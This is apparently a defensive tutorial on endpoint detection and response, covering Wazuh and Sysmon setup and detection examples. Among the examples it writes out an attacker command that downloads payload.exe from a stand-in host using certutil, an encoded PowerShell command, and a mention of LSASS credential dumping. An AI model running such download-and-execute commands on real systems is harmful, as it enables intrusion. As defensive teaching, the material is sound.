Traditional antivirus software compares files against a database of known malware signatures. Modern attackers have known for years how to bypass this — polymorphic code, fileless attacks, and living-off-the-land techniques render signature-based AV largely ineffective against targeted attacks. Endpoint Detection and Response (EDR) takes a fundamentally different approach.
AV vs EDR: The Core Difference
# Traditional AV:
# - Scans files for known malware signatures
# - Blocks files that match known-bad patterns
# - Reactive: only catches known threats
# - No visibility into behavior after installation
# EDR:
# - Monitors behavior continuously (process creation, file access, network connections, registry changes)
# - Uses ML and behavioral analysis to detect suspicious patterns
# - Proactive: can catch zero-day threats by behavior
# - Records telemetry for forensic investigation
# - Can automatically isolate compromised endpoints
# Simple analogy:
# AV = Checking ID at the door (can be faked)
# EDR = Monitoring cameras inside the building (behavior-based)What EDR Monitors
# EDR agents collect this telemetry continuously:
Process events:
- Process creation (parent-child relationships)
- Process injection (code into other processes)
- Memory allocation patterns
- Code execution from unusual locations
File system events:
- File creation, modification, deletion
- Files written to sensitive locations (System32, Startup)
- Executable files written by non-system processes
Network events:
- All outbound connections with process attribution
- DNS queries
- Unusual protocol usage
Registry events:
- Run keys (persistence mechanisms)
- AutoRun modifications
- Security policy changes
Authentication events:
- Login attempts
- Credential access (LSASS access)
- Token manipulationFree and Open-Source EDR Options
# Wazuh (fully free, open source):
# Combines SIEM + EDR capabilities
# Excellent for SMBs
# Install Wazuh agent on Windows (PowerShell):
Invoke-WebRequest -Uri "https://packages.wazuh.com/4.x/windows/wazuh-agent-4.7.0-1.msi" -OutFile "wazuh-agent.msi"
Start-Process msiexec.exe -ArgumentList "/i wazuh-agent.msi WAZUH_MANAGER=YOUR_WAZUH_MANAGER_IP /q" -Wait
# Install on Linux:
curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -
apt-get install wazuh-agent
# Configure Sysmon for enhanced Windows telemetry:
# Download Sysmon from Sysinternals:
sysmon64.exe -accepteula -i sysmonconfig.xml
# Use SwiftOnSecurity config: github.com/SwiftOnSecurity/sysmon-config
# Microsoft Defender for Endpoint (EDR tier, paid):
# Built into Windows - just needs the license activation
# Excellent detection, deep Windows integrationKey EDR Detection Examples
# 1. Detecting process injection (Cobalt Strike beacon):
# Alert: notepad.exe spawned network connection
# Normal: notepad.exe NEVER makes network connections
# EDR flags: Process behavior anomaly + network telemetry
# 2. Detecting LSASS credential dumping:
# Alert: mimikatz.exe or lsass.exe memory read from non-SYSTEM process
# Wazuh rule detects:
# - Event ID 4656 (Handle requested for lsass.exe)
# - From process not in whitelist
# 3. Detecting living-off-the-land attacks:
# Alert: certutil.exe downloading file (abnormal usage)
certutil.exe -urlcache -split -f http://malicious.com/payload.exe
# Normal: certutil manages certificates
# EDR behavioral rule: certutil + URL download = suspicious
# 4. PowerShell encoded commands:
# Attackers use Base64 encoding to evade detection:
powershell -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAA=
# EDR: Alert on encoded PowerShell with network activity or process spawningIncident Response with EDR
# When EDR triggers an alert, you can:
# 1. Investigate timeline:
# What happened 1 hour before the alert?
# What processes ran? What files were written? What network connections?
# 2. Isolate the endpoint (network isolation):
# EDR -> Endpoint -> Isolate
# Machine stays on for forensics but network traffic blocked
# Analyst can still connect via EDR console
# 3. Live response:
# Many EDRs allow: run commands, collect files, take memory dumps
# WITHOUT physically touching the machine
# 4. Hunt across all endpoints:
# "Show me all machines that executed this hash in the last 30 days"
# "Show me all machines that connected to this IP"
# Identify scope of breach across entire fleet instantlyWrap Up
Traditional AV is necessary but not sufficient in 2025. EDR adds the behavioral monitoring layer that catches attacks that bypass signature detection. For small businesses: start with Wazuh (free) + Sysmon. For larger organizations: Microsoft Defender for Endpoint, CrowdStrike Falcon, or SentinelOne provide enterprise-grade EDR. The telemetry EDR provides is also invaluable for incident response investigations.